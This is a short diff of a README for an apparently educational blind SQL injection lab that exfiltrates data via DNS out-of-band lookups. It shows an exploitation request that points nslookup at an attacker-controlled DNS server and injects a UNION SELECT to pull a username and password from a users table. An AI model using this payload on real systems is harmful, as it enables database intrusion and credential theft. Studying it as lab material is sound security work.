zinzloun/blindSQLi-DNS-OOB/README.md

 	[+] Plain domain value: www.google.it

 ## 💥Exploitation
-Knowing tha we can control the DNS parameter for nslookup and assuming that a users table is also present in the DB, we can use the following payload to obtain sensitive information:
+Knowing that we can control the DNS parameter for nslookup and assuming that a users table is also present in the DB - how could it be missing? 😊  - we can use the following payload to exfiltrate sensitive information:

 	/search?set-dns=172.20.53.53&id=1 UNION SELECT (SELECT username || '-' || password FROM users WHERE id=1)
  Check again the logged query